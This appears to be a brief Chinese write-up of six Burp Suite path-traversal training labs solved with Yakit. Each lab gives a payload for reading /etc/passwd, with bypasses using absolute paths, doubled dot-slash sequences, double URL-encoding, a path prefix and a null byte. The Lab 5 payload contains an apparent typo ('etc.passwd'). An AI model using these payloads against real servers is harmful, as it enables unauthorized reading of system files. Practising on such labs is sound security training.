Yakit打BurpSuite靶场—路径遍历篇
Lab 1
File path traversal, simple case
1
../../../../../../etc/passwd
Lab 2
File path traversal, traversal sequences blocked with absolute path bypass
1
/etc/passwd
Lab 3
File path traversal, traversal sequences stripped non-recursively
1
....//....//....//....//....//etc/passwd
Lab 4
File path traversal, traversal sequences stripped with superfluous URL-decode
1
..%252F..%252F..%252F..%252Fetc%252Fpasswd
Lab 5
File path traversal, validation of start of path
1
/var/www/images/../../../../etc.passwd
Lab 6
File path traversal, validation of file extension with null byte bypass
1
../../../../etc/passwd%00.jpg
本文由作者按照
CC BY 4.0
进行授权